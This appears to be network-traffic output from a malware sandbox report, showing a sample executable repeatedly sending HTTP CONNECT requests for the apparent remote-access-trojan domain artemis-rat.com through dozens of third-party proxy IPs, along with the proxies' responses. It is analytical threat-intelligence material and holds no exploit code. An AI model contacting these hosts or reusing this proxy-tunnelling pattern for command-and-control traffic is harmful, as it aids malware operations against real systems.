                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.477221012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1332192.168.2.553613172.67.14.237803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.477225065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.632417917 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1333192.168.2.551909193.30.13.189993876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.477380991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.862407923 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1334192.168.2.55354247.74.226.850013876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.477448940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1335192.168.2.553559192.210.228.28156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.481389046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1336192.168.2.55307089.46.249.14888883876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.495727062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592600107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594937086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.701955080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:57.200769901 CET228INHTTP/1.0 502 Bad Gateway
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 32 3e 3c 68 33 3e 48 6f 73 74 20 4e 6f 74 20 46 6f 75 6e 64 20 6f 72 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 61 69 6c 65 64 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h2>502 Bad Gateway</h2><h3>Host Not Found or connection failed</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1337192.168.2.55362850.63.12.33614643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.495817900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1338192.168.2.553578154.205.152.9690803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.507563114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.716461897 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1339192.168.2.55357338.162.10.16431283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.507651091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.934410095 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1340192.168.2.553543103.216.49.15180803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.512361050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1341192.168.2.551991213.136.79.177329303876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.517775059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592648983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.594937086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.701955080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1342192.168.2.55206491.134.140.16025723876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.520736933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.092535973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.702043056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.889789104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1343192.168.2.551987213.202.230.241803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.527832985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514467001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.514738083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.608267069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1344192.168.2.553590135.148.10.161316963876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.531172037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.179681063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.996923923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405591965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.217849016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.014802933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905126095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:00.514575958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1345192.168.2.55208779.110.196.14580813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.536935091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1346192.168.2.553545125.122.26.24210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.547410011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1347192.168.2.552078103.169.149.25411113876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.552999020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.362740040 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1348192.168.2.553637104.18.220.95803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.566050053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.721604109 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1349192.168.2.553568195.154.172.16131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.571873903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:43.185669899 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:43.998756886 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:44.894727945 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:46.687155008 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:50.272243023 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:57.438718081 CET39INHTTP/1.1 200 Connection established
                                                                                                                                                                                                                                                            Mar 11, 2024 03:33:11.774764061 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1350192.168.2.551938171.244.140.160345593876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.583686113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.592690945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1351192.168.2.553583134.209.189.42803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.586477995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.880511999 CET327INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:43 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 166
                                                                                                                                                                                                                                                            Connection: close
